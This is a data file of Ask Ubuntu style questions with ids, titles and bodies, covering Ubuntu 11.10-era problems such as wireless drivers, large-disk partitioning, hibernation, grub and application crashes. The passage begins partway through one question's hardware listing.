6c:62:6d:1a:3a : dd - width : 32 bits - clock : 33mhz - capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless - configuration : broadcast=yes driver=rt2800pci driverversion=3.0.0-13-generic firmware=0.34 latency=0 link=no multicast=yes wireless=ieee 802.11bgn - resources : irq:19 memory : febf0000-febfffff sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation mobile 4 series chipset memory controller hub [ 8086:2a40 ] ( rev 07 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 4 series chipset integrated graphics controller [ 8086:2a42 ] ( rev 07 ) 00:02.1 display controller [ 0380 ] : intel corporation mobile 4 series chipset integrated graphics controller [ 8086:2a43 ] ( rev 07 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 [ 8086:2937 ] ( rev 03 ) 00:1a.1 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 [ 8086:2938 ] ( rev 03 ) 00:1a.7 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 [ 8086:293c ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801i ( ich9 family ) hd audio controller [ 8086:293e ] ( rev 03 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 1 [ 8086:2940 ] ( rev 03 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 4 [ 8086:2946 ] ( rev 03 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 [ 8086:2934 ] ( rev 03 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 [ 8086:2935 ] ( rev 03 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 [ 8086:2936 ] ( rev 03 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 [ 8086:293a ] ( rev 03 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev 93 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation ich9m-e lpc interface controller [ 8086:2917 ] ( rev 03 ) 00:1f.2 sata controller [ 0106 ] : intel corporation ich9m/m-e sata ahci controller [ 8086:2929 ] ( rev 03 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 82801i ( ich9 family ) smbus controller [ 8086:2930 ] ( rev 03 ) 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 02 ) 03:00.0 network controller [ 0280 ] : ralink corp. rt3090 wireless 802.11n 1t/1r pcie [ 1814:3090 ] rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no
84524	agonizingly long install ?	how long is the install supposed to take usually ? i was stuck at partitioning the drive ( 1tb ) for over 2 hours and now i 'm stuck at creating the ext4 file system ; it 's been that way for over 30 minutes .
84531	fast battery consumption on samsung pabas024	i have a lenovo 3000 n100 and my battery gets low real fast ( sorry for bad english ) i read somewhere to execute cat /proc/acpi/battery/bat1/info and check out design and last full capacity if they match that it is good if they do n't my battery is properly dead/broken well as you can see they match present : yes design capacity : 4800 mah last full capacity : 4800 mah battery technology : rechargeable design voltage : 11100 mv design capacity warning : 420 mah design capacity low : 156 mah cycle count : 0 capacity granularity 1 : 264 mah capacity granularity 2 : 3780 mah model number : pabas024 serial number : 3658q battery type : lion oem info : samsung after that i did some googling and thought i found a fix . i added pcie_aspm=force to /etc/default/grub . i fully charged the battery but still when i take out the adapter i immediately get message box that says battery critically low . then when it gets in sleep mode and i connect my adapter again and wakes up from hibernation my screen is all white and black . i found in askubuntu that you should put aspm=force in this line grub_cmdline_linux_default= '' quiet splash pcie_aspm=force '' and not in a seperate line when i did that immediatly to 2 min then to 27 min then 24 min then 15/22/19/11/12/8/5/1 43 min battery , but hibernation still crashes how do i solve this ?
84532	drush add aliases for ubuntu drush ?	i natively installed ubuntu with the package manager through apt-get install drush . after a find i discovered that they 're natively installed at /usr/share/drush . my question is the following : is it possible to add aliases with the ubuntu brewed drush ? if so where ? in the /usr/share/drush/ folder ? the ubuntu version seems to be missing the example folder as well as some other files : ini , topic files .
84536	does safenet token and openvpn work on 11.10 ?	does anybody have a way to make openvpn work on oneiric with a safenet token ? i have install properly the token : http : //www.jlaundry.com/2011/aladdin-etoken-on-ubuntu-11-10-oneiric-ocelot-amd64/ it work , but when i try to use openvpn with that , it do n't want to connect . it can identify himself with the token , any body have an idea for that ? my other try was to install into a boostrap `` lucid '' , install the drivers , use the vpn , i have mount with bind , the /etc/resolvconf and when i connect myself into the boostrap , it install the network properly in the host . but the subsystem lock the token , so i ca n't use it in the host .
84538	trouble creating 3tb ext4 partition due to msdos-partition-table-imposed error	i just bought a 3tb wd green drive , but when i try to partition in in gparted i get an error like : ====================== libparted : 2.3 ====================== partition length of 5860530176 sectors exceeds the msdos-partition-table-imposed maximum of 4294967295 and when i try with ubuntu `` disk utility '' i get a similar error like : error creating partition : helper exited with exit code 1 : in part_add_partition : device_file=/dev/sdc , start=0 , size=3000592982016 , type=0x83 entering ms-dos parser ( offset=0 , size=3000592982016 ) msdos_magic found looking at part 0 ( offset 0 , size 0 , type 0x00 ) new part entry looking at part 1 ( offset 0 , size 0 , type 0x00 ) new part entry looking at part 2 ( offset 0 , size 0 , type 0x00 ) new part entry looking at part 3 ( offset 0 , size 0 , type 0x00 ) new part entry exiting ms-dos parser msdos partition table detected containing partition table scheme = 0 got it got disk new partition error : partition length of 5860528002 sectors exceeds the msdos-partition-table-imposed maximum of 4294967295 ped_disk_add_partition ( ) failed
84545	problem after upgrading from 10.04 to 11.10 on a mac	i 've just upgrade from ubuntu 10.04 to 11.10 on my mac ( os x ) but after it has restarted , it would not open after selecting the ubuntu launcher . i have a black screen with a flashing bar and can not do anything else en ubuntu . the partition that has mac is fully functional . what can i do to recuperate the ubuntu partition and make it work ? thank you .
84547	$ local_fs not including all drives	this is a refinement of a question i asked yesterday , the product of deeper research i have done since . the script that starts crashplan has , as it should , a hard dependency on $ local_fs in its lsb required-start entry . the problem is coming about when this dependency is satisfied without the usb volume being mounted . therefore crashplan thinks it has to create its backup destination and the conflicts begin . my understanding of $ local_fs is that everything in mtab will be mounted before it is satisfied . is that not the case ? are there options i can add to the mtab entry to change this behavior for the volume in question ?
84548	best graphics card for running two monitors with unity	i 'm attempting to switch from a win7 system to ubuntu 11.10 running unity . my current two gfx cards + two monitors setup is not going to work as i want ( multiple x servers ) , so i want to buy a new single gfx card with two dvi outputs that i hope will simplify things . i 'm a bit overwhelmed by choice though ! it seems nvidia is a good option - but which one ? i want to spend the least that i need to . i use the machine for development not gaming . and there 's plenty of space - i have a tower case . many thanks
84551	failing to recover from hibernate	im having a problem with ubuntu , its not recovering from hibernate . the system will actually hibernate correctly ( ive installed uspwsusp so i can see whats happening ) , but when i restart my laptop , i get a solid purple screen ( not the usual ubuntu splash screen ) , and it seems to wait for a while ( ~10s ) , before dropping onto the usual ubuntu bootup screen , where it goes on to do a standard boot process . is there anyway i can get hibernate to work properly ? im using ubuntu 11.10 x64
84553	can unity dashboard search the phrase approximately ?	i want to know is there an option that unity dashboard search the phrase in not an exact manner , for example when you want open `` firefox '' , if you type `` friefox '' or `` frefox '' it would not find the application , but in fast typing this happens a lot . so i think it would be useful .
84554	network login vs. network cable	i disconnected network cable to ... . move it . when i reconnect it the whole system had problem with it . i was not able to execute console or log in ( on ctrl+shift+fx consoles ) . after some time 20 consoles ( gnome-terminal ) did open . however i still have no internet . p.s . i do not have root account how can i restart network card ? do i need to restart system ?
84556	restart computer without root from script	when i type reboot i get reboot : need to be root p.s . i do not have sudo privileges and password
84558	if an external hard drive worked on 10.04 and 10.10 , will it work on 11.10 ?	i am considering purchasing a western digital elements 2 tb external desktop hard drive ( usb 2.0 , black ) from amazon.co.uk , and because it has over a thousand reviews , there are a reasonable amount from linux , specifically ubuntu users , and while most list as five star , some said it needed reformatting . i am not worried about reformatting , but want to know it will be accessible at all . is compatibility with 10.04/10 a guarantee of compatibility with 11.10 ?
84564	gimp not working after updating to 11.10	i just updated to 11.10 and gimp is not working anymore . here is the error : ( gimp:1689 ) : glib-warning ** : /build/buildd/glib2.0-2.30.0/./glib/goption.c:2168 : ignoring no-arg , optional-arg or filename flags ( 8 ) on option of type 0 any idea how to solve the problem ?
84567	individually upgrading packages	is it possible to upgrade just a single package and its dependencies to their latest version ? i know its recommended to do a total upgrade , but when you are in a hurry or are in short of bandwidth , you ca n't take total upgrade as an option : example scenario i 've just added a new ppa of vlc ... runs sudo apt-get upgrade ; slow connection shows a huge estimate of time an bandwidth ctrl+c 's it
84569	how to install network-manager after uninstalling it	i hope this has not been covered elsewhere already . it is rather specific an issue , and related to a computer-manufacturer , but i need help for something ubuntu-related that should be no problem for you guys : ) so , i have this ideacentre q150 , which seems to be an excellent option for just having a computer at home to surf and to do some editing . however , after installing ubuntu over win7 , it only takes the wireless connection into account , and says there was no cable connected , but there is ! and under win7 , the cable was recognized . i have tried this actually on 3 ideacentres , win7 works , and both ubuntu 11.10 do n't . this german website suggests to download 2 packages ( http : //de.archive.ubuntu.com/ubuntu/pool/main/n/network-manager/network-manager_0.8-0ubuntu3_amd64.deb and http : //de.archive.ubuntu.com/ubuntu/pool/main/n/network-manager-applet/network-manager-gnome_0.8-0ubuntu3_amd64.deb ) and to sudo apt-get remove -- purge network-manager network-manager-gnome . but somehow , the dependencies on the two files are not met , and without the network , and as it was a new install , i just reinstalled ubuntu once more as it just such an easy thing to do . i have searched through http : //packages.ubuntu.com/oneiric/net/ and have found the 2 packages the user suggested , which i assume were more up to date ( http : //packages.ubuntu.com/oneiric/net/network-manager and http : //packages.ubuntu.com/oneiric/net/network-manager-gnome ) , but for the formats , i am not sure which one would be best and easiest to install ... .dsc , .tar.bz2 , .tar.gz ? and even then , what to do with the files ? i found how do i install tar bz2 and gz files ? but i am guessing softwarecenter would be out of the question ? and lastly ! if you know of any other ways that could work , i am all ears ! : ) thanks for any pointers ! addition : # # @ # # : ~ $ cat /var/lib/networkmanager/networkmanager.state [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # @ # # : ~ $ cat /var/lib/networkmanager/networkmanager.state [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # @ # # : ~ $ lspci -nnk | grep -i net 01:08.0 ethernet controller [ 0200 ] : intel corporation 82552 10/100 network connection [ 8086:10fe ] ( rev 02 ) # # @ # # : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 38:60:77:71 : b5:89 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 74:2f:68:28:00 : a7 inet addr:192.168.178.66 bcast:192.168.178.255 mask:255.255.255.0 inet6 addr : fe80 : :762f:68ff : fe28 : a7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7477 errors:0 dropped:53 overruns:0 frame:0 tx packets:5336 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:6669541 ( 6.6 mb ) tx bytes:1033545 ( 1.0 mb ) # # @ # # : ~ $ dmesg | egrep 'eth0|e100|firm' [ 1.230481 ] e100 : intel ( r ) pro/100 network driver , 3.5.24-k2-napi [ 1.230490 ] e100 : copyright ( c ) 1999-2006 intel corporation [ 1.230616 ] e100 0000:01:08.0 : pci int a - > gsi 20 ( level , low ) - > irq 20 [ 1.258225 ] e100 0000:01:08.0 : pme # disabled [ 1.259625 ] e100 0000:01:08.0 : eth0 : addr 0xfcfff000 , irq 20 , mac addr 38:60:77:71 : b5:89 [ 17.468302 ] r8712u : loading firmware from `` rtlwifi/rtl8712u.bin '' # # @ # # : ~ $ lsmod | grep e100 e100 37213 0 # # @ # # : ~ $ cat /etc/network/interfaces auto lo iface lo inet loopback # # @ # # : ~ $ ping -c 4 192.168.178.1 ping 192.168.178.1 ( 192.168.178.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.178.1 : icmp_req=1 ttl=64 time=1.20 ms 64 bytes from 192.168.178.1 : icmp_req=2 ttl=64 time=1.20 ms 64 bytes from 192.168.178.1 : icmp_req=3 ttl=64 time=1.14 ms 64 bytes from 192.168.178.1 : icmp_req=4 ttl=64 time=1.24 ms -- - 192.168.178.1 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3003ms rtt min/avg/max/mdev = 1.142/1.197/1.247/0.050 ms ` # # @ # # : ~ $ sudo lshw -c network [ sudo ] password for # # : *-network disabled description : ethernet interface product : 82552 10/100 network connection vendor : intel corporation physical id : 8 bus info : pci @ 0000:01:08.0 logical name : eth0 version : 02 serial : 38:60:77:71 : b5:89 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=full firmware=n/a latency=64 link=no maxlatency=56 mingnt=8 multicast=yes port=mii speed=100mbit/s resources : irq:20 memory : fcfff000-fcffffff ioport : dc00 ( size=64 ) *-network description : wireless interface physical id : 1 bus info : usb @ 1:1 logical name : wlan0 serial : 74:2f:68:28:00 : a7 capabilities : ethernet physical wireless configuration : broadcast=yes driver=r8712u ip=192.168.178.66 multicast=yes wireless=ieee 802.11bg
84570	banshee crashes consistently - is there a fix ?	since updating to ubuntu 11.10 i 've had trouble with banshee . in particular when i run it i find that it crashes within an hour without fail . i get the following unhandled exception : system.reflection.targetinvocationexception : exception has been thrown by the target of an invocation . -- - > system.nullreferenceexception : object reference not set to an instance of an object at mono.zeroconf.providers.avahidbus.browseservice.disposeresolver ( ) [ 0x00000 ] in < filename unknown > :0 at mono.zeroconf.providers.avahidbus.browseservice.dispose ( ) [ 0x00000 ] in < filename unknown > :0 at mono.zeroconf.providers.avahidbus.servicebrowser.onitemremove ( int32 interface , protocol protocol , system.string name , system.string type , system.string domain , lookupresultflags flags ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper managed-to-native ) system.reflection.monomethod : internalinvoke ( system.reflection.monomethod , object , object [ ] , system.exception & ) at system.reflection.monomethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 -- - end of inner exception stack trace -- - at system.reflection.monomethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 at system.reflection.methodbase.invoke ( system.object obj , system.object [ ] parameters ) [ 0x00000 ] in < filename unknown > :0 at system.delegate.dynamicinvokeimpl ( system.object [ ] args ) [ 0x00000 ] in < filename unknown > :0 at system.multicastdelegate.dynamicinvokeimpl ( system.object [ ] args ) [ 0x00000 ] in < filename unknown > :0 at system.delegate.dynamicinvoke ( system.object [ ] args ) [ 0x00000 ] in < filename unknown > :0 at ndesk.dbus.connection.handlesignal ( ndesk.dbus.message msg ) [ 0x00000 ] in < filename unknown > :0 at ndesk.dbus.connection.dispatchsignals ( ) [ 0x00000 ] in < filename unknown > :0 at ndesk.dbus.connection.iterate ( ) [ 0x00000 ] in < filename unknown > :0 at mono.zeroconf.providers.avahidbus.dbusmanager.iteratethread ( system.object o ) [ 0x00000 ] in < filename unknown > :0 does anyone else also have this problem ?
84571	i can not create a user with an encrypted homedir	in previous versions of ubuntu you could create users with encrypted partition from the `` user accounts '' gui utility . now this option is absent from ubuntu 11.10 ( oneiric ) . how can you create a user with encrypted homedir in 11.10 . command line instructions acceptable ! : )
84573	firefox 4 and firefox 3.6 , users can not start firefox 3.6	i installed firefox 4 and downloaded firefox 3.6 because molybdenum is not available for ff4 ! firefox 3.6 is located /usr/local/share/firefox-36/firefox ( only root can run ff3.6 ) . if the user `` peter '' goes to /usr/local/share/firefox-36/ and run firefox , firefox 4 startsup instead of firefox 3.6 ! is there any workaround to start ff36 as `` peter '' ? edit : if i use -- debug this get prited to console peter @ muhahaha : /usr/local/share/firefox-36 $ ./firefox -- debug ./run-mozilla.sh -g ./firefox-bin mozilla_five_home= . ld_library_path=. : ./plugins : . display=:0.0 dyld_library_path=. : . library_path=. : ./components : . shlib_path=. : . libpath=. : . addon_path= . moz_program=./firefox-bin moz_toolkit= moz_debug=1 moz_debugger= /usr/bin/gdb -- args ./firefox-bin gnu gdb ( ubuntu/linaro 7.2-1ubuntu11 ) 7.2 copyright ( c ) 2010 free software foundation , inc. license gplv3+ : gnu gpl version 3 or later < http : //gnu.org/licenses/gpl.html > this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . type `` show copying '' and `` show warranty '' for details . this gdb was configured as `` x86_64-linux-gnu '' . for bug reporting instructions , please see : < http : //www.gnu.org/software/gdb/bugs/ > ... reading symbols from /usr/local/share/firefox-36/firefox-bin ... ( no debugging symbols found ) ... done . ( gdb ) update : a few days later the versions switched : i can start ff4 only as root , users always start ff36 now !
84574	disable < alt > key on unity 2d ?	i 'm using photoshop through wine and the alt key is currently mapped to the window picker . however , i need the functionality of the alt key within photoshop . in previous ubuntu versions i could change it under preferences > windows . how can it be done in ubuntu 11.10 with unity 2d ?
84579	music player - tracking radio 's songs	i 'm using vlc and http : //open.fm/ music radio . i would like to be able to track ( to the files would be the best ) the names of songs that were played , so later if i want to hear some song again its easy to find it .
84580	what graphic cards support opengl es 2.0 ?	i read this post yesterday on google+ that talked about the increased smoothness of animations due to the adaption of opengl es 2.0 in the version of compiz in ubuntu 12.04 alpha 1 . i was curious if anyone knew what graphics chipsets support this and will see the improvements . thanks ,
84584	converting mp4 to mp3	i have a video i need to convert to mp3 ( from the command line - not gui ) video.mp4 i tried : ffmpeg -i -b 192 video.mp4 video.mp3 with no success . i get the following error : warning : library configuration mismatch seems stream 0 codec frame rate differs from container frame rate : 59.83 ( 29917/500 ) - > 59.75 ( 239/4 ) warning : the bitrate parameter is set too low . it takes bits/s as argument , not kbits/s encoder ( codec id 86017 ) not found for output stream # 0.0 so i tried lame : lame -h -b 192 video.mp4 video.mp3 i get : warning : unsupported audio format am i missing something ?
84599	usb wifi is detected but ca n't connect	i have recently purchased a usb wifi adapter with a realtek chipset for my netbook . network-manager detects it well enough and can see my home wifi network too , but when i try connecting i am just prompted endlessly for the wpa password , as if connection is somehow rejected or fails ( i am using the right password ) . a series of info about my network setup can be found here . the relevant network interface is wlan1 . *-network description : wireless interface physical id : 2 bus info : usb @ 1:1 logical name : wlan1 serial : 80 : c0 : b0:70 : e0:20 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu driverversion=3.0.0-13-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bgn lsusb : bus 001 device 002 : id 2001:3308 d-link corp. what might be the issue or how do i troubleshoot it ? thanks .
84600	toggle horizontal , vertical and full window maximization within unity ?	i want to toggle windows between : horizontal maximized < - > horizontal unmaximized alt+f7 vetical maximized < - > vertical unmaximized alt+f6 ( both ) maximized < - > ( both ) unmaximized alt+f5 i looked into ccsm but the maximization plugin does n't work this way or i did n't figured it out . thanks for your suggestions .
84601	what hash algorithm is used for passwords stored in shadow in 11.10 ?	i 'm a little bit confused if it 's md5 or sha .
84607	ubiquity customization	i installed ubiquity : sudo apt-get install ubiquity ubiquity-casper ubiquity-slideshow-ubuntu ubiquity-frontend-gtk and i made some modifications to it : changed the images to match my company added new slides etc ... . everything looks good , but now how can i put it back into the installer ? do i need to re-compile ? use lz ? something else ?
84608	login fails and returns to login screen	i run ubuntu 10.04 inside vmware on a windows host . after a power outage i can no longer log into ubuntu . i get to the login screen , which mysteriously also changed its color theme from the standard ubuntu theme to some bluish theme . when i type in my password . it seems to do something , the screen turns black a cursor appears for a second but then it returns to the login screen . in the upper right corner appears a error message : install problem ! the configuration defaults for gnome power manager have not been installed correctly . please contact your computer administrator . just to be clear , if i type in the wrong password , i get the regular authentication failure error . any ideas of what 's going on ? how could i save the system ?
84614	how do i configure thunderbird unity integration , particularly the monitoring of selected folders ?	in ubuntu 11.04 i was using two thunderbird extensions : - messaging menu and unity launcher integration - unity launcher integration since 11.10 it seems they are bundled with thunderbird . but i miss a configuration feature that limit the folders which are monitored by the extensions . i just want to monitor inbox folders for new mails , not all of my folders ... is there a way do to this ?
84615	granola & granola-gui fail to start	selecting previously deselected package granola . ( reading database ... 183125 files and directories currently installed . ) unpacking granola ( from ... /granola_4.0.3-0oneiric1_i386.deb ) ... processing triggers for ureadahead ... processing triggers for man-db ... setting up granola ( 4.0.3-0oneiric1 ) ... removing any system startup links for /etc/init.d/ondemand ... * starting granola granola [ fail ] sudo apt-get install granola-gui reading package lists ... done building dependency tree reading state information ... done e : unable to locate package granola-gui on the website it says it 's compatible with 11.10 http : //grano.la/support/linux_install.php ? download & os=linux # repoconfig anyone solved the problem ?
84616	how to remove ubuntu 10.10 grub bootloader ?	i installed ubuntu 11.10 on my laptop alongside windows 7 , and the grub screen was purple . after that , i installed ubuntu 10.10 and the grub screen was black . when i decided to uninstall ubuntu 10.10 , the bootloader did n't change and i was greeted by a black terminal screen . how do i remove the ubuntu 10.10 grub bootloader and use the ubuntu 11.10 one ?
84617	missing windows xp in boot selection	i 'm actually having problems to boot back to my windows xp after setting the ubuntu as default.i was using ubuntu startup manager to change the default boot and also windows xp setting on startup selection at first i was following this thread how do i set windows to boot as the default in the boot loader ? but when i try to use the code administrator @ ubuntu : ~ $ fgrep menuentry /boot/grub/grub.cfg menuentry `` ubuntu ( on /dev/sda1 ) '' -- class windows -- class os { menuentry 'ubuntu , with linux 3.0.0-13-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { menuentry 'ubuntu , with linux 3.0.0-13-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { menuentry 'ubuntu , with linux 3.0.0-12-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { menuentry 'ubuntu , with linux 3.0.0-12-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { also i have been using this administrator @ ubuntu : ~ $ sudo update-grub [ sudo ] password for administrator : generating grub.cfg ... found ubuntu on /dev/sda1 found linux image : /boot/vmlinuz-3.0.0-13-generic found initrd image : /boot/initrd.img-3.0.0-13-generic found linux image : /boot/vmlinuz-3.0.0-12-generic found initrd image : /boot/initrd.img-3.0.0-12-generic done it seems that my windows xp is not in the list . and of course there is no xp in startup manager . so how can i back to windows xp then ? ? i am really an absolute beginner on ubuntu . thanks ! ( and sorry if i did n't post this correctly . please teach me how : p )
84621	how to create an iso from a scratched dvd	i 'm trying to create a back up for a dvd of mine which is scratched a bit . k3b and brasero have so far failed as the process gets stuck around 93 percent . any help to make this process successful ?
84624	why do i see fixed horizontal lines on my desktop ?	i 've just installed ubuntu on my computer and there is something wrong on my desktop . this is an image of the problem ( look at the top ) : my graphics card is an ati radeon x1250 ; i read the drivers are no longer supported in ubuntu 11.10 and i think i have the free drivers . i have no idea of what to do !
84625	how can i make unity to search a program , say from my home directory ?	i 'd like to see the program icon when i type the program name into the search bar , and when i click it , the program will be launched .
84627	icon disappears from launcher after reboot	i 'm using 11.10 . i 've created /usr/share/applications/idea.desktop with such content : [ desktop entry ] name=intellijidea comment=idea exec=idea startupnotify=true icon=/usr/java/idea-iu-107.587/bin/idea128.png terminal=false type=application then i opened dash and typed idea . i saw an icon and pressed it . the application started . i clicked with the right mouse button on its icon in the launcher and selected `` keep in launcher '' . when i restarted my notebook , the icon disappeared from the launcher . where can be the problem ?
84631	how do i switch off `` continuous '' mode permanently in evince ?	this is an faq on the website for evince but without any answer . i searched gconf but with no luck . even on a per document basis , evince wo n't remember this setting ! i want it to be off . any help on this ?
84632	what is the best lightweight monitoring system run under nginx ?	i want to monitor my small vps node ; presently serving by nginx . i do not want to use apache2 ; presently considering monitorix , suggest me the best lightweight monitoring system run under nginx ?
84634	command line open browser window at size ?	is it possible to open a browser window at a given size/location on screen via a shell script ? i 've seen examples of launching firefox , setting the window size via command line . i 've also seen it written up as non working as a firefox bug . are there any alternative browsers that will do this that run on 10.04 ?
84635	ca n't enable ralink rt2561/rt61 wireless card	i have been reading various other posts on the matter but none of the solutions are working so i thought i might as well ask . just installed ubuntu server 11.04 on my old dell optiplex 330 . it has a wireless pci card installed that i bought for it 's compatibility with ubuntu 10 . it was working on ubuntu 10 prior to the new install . after the install there were no lights on the card and i can not use it . when running ; sudo lshw -c network the device is listed but labelled disabled . the card is a ralink corp , rt2561/rt61 802.11g pci this is a headless install so command line help only please . thanks in advance ! sudo lshw -c network *-network description : ethernet interface product : netlink bcm5787 gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 02 serial : 00:1d:09:1e:89:5f size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.119 duplex=full firmware=5787-v3.23 ip=192.168.0.9 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : dcff0000-dcffffff *-network disabled description : wireless interface product : rt2561/rt61 802.11g pci vendor : ralink corp. physical id : 2 bus info : pci @ 0000:03:02.0 logical name : wlan0 version : 00 serial : 00:1f:1f:8f : eb : e6 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt61pci driverversion=3.0.0-12-generic-pae firmware=n/a latency=64 link=no multicast=yes wireless=ieee 802.11bg resources : irq:18 memory : dcef8000-dcefffff iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : off
84638	why can i not see java applets in firefox 8 on ubuntu 10.04 ?	examples are the java `` play against the computer '' applet on a chess website ; there is also the java chat room on another website that just shows a white area where the chat room was supposed to be . i do have the java plugin for the browser , icedtea6-plugin , installed , because synaptic package manager shows a green square next to it . also , when i follow the link http : //apt.ubuntu.com/p/icedtea6-plugin , i get an alert box that says that the icedtea6-plugin is already installed . i also have java installed , because i can run netbeans .
84641	`` grub rescue '' prompt after using hp recovery manager to reinstall windows 7	i used hp recovery manager to install windows 7 . i previously had ubuntu 11.10 installed . now when i boot i get a grub rescue prompt and error : unknown filesystem . does anyone know how to fix this ? thanks .
84642	how do i create a chroot of an earlier version of ubuntu ?	i 'd like to create a virtual instance of the latest lts so i can test the software i 'm writing in a way that more closely matches our production environment . there seem to be many , many different ways of doing this : use debootstrap with schroot ; use debootstrap with dchroot ; use mk-sbuild ... and pages like https : //wiki.ubuntu.com/debootstrapchroot have multiple options , and must surely have been replaced by small shell scripts by now . how should i do this ?
84650	android plugin in eclipse lost after upgrade	recently , i upgraded from ubuntu 11.04 to 11.10 , eclipse also upgraded to helios but android plugin and projects are lost.what to do to restore them ?
84653	problem with window manager ?	i have installed ubuntu server 11.10 on my pc . but i decided to install an ubuntu-desktop package as i would like to have a possibility to start gui when i would need it . so i ran command : sudo apt-get install ubuntu-desktop now when i want to change to gui mode i run command : startx and there is a problem becouse i get gui which is not coplete . there is a upper control panel , but there is a white wallpaper and windows dont 's show up . i would attach a picture but i ca n't becouse i 'm new user . could anybody help me ?
84656	where can i find the logs of irc charm school ?	i am looking for the logs of the freenode juju charms class that occurred on the 2nd of december , 2011 . do they exist ? where can i find them ?
84660	is it possible to access the files stored in the cloud from the u1 client in unity ?	is it possible to access the files stored in the cloud from the u1 client in unity ? at this moment , i can only access the blank `` shared with me '' folder on my pc or the folders , with no possibility to open them from the client . until now , i used to go to the u1 website log on and access contacts and files from there , but i think that since there is the client embedded in unity , there should be a way to access it without having to go away from the client and then back . is there , though ?
84662	how to copy files from remote server to local machine ?	i use ssh mylogin @ server to connect to a remote server ... i am wondering how to copy the whole files from there to my local machine ... one reason to do this , is that , i could not compile a latex file on the server , there is an error : ! latex error : file tikz.sty not found . i guess this error will disappear if i compile the same file on my local machine . another reason is that it seems that there are not too many tools on the server , for example , i can not open a pdf by evince , which is doable on my local machine . could anyone help ?
84664	i can not install drivers for ati radeon hd 6770	i can not install drivers for ati radeon hd 6770 . here comes the message : sorry , this driver installation failed . please refer to the log file for more information : / var / log / jockey.log from jockey.log ati2011-12-02 19:39:47,493 debug : updating jockey.detection.localkernelmodulesdriverdb instance at 0x1a088c0 >
84668	gnome 3 panel and menus are all gone ?	i am running ubuntu 11.10 using gnome 3 shell . i have set my pc to automatically log into gnome shell so i do not see the login screen . today i installed some updates and now the gnome panel is gone . when my pc logs in i only see the background . there are no menus , nothing ! even the exit , minimize and maximise buttons in the top tight corner of the windows are gone . also , alt+f2 also does not work . any ideas how to fix this ? i have a nvidia geforce 7900gto with the nvidia proprietary drivers installed . i have also used the recovery mode and removed some packages that apparently were broken . still does not work .
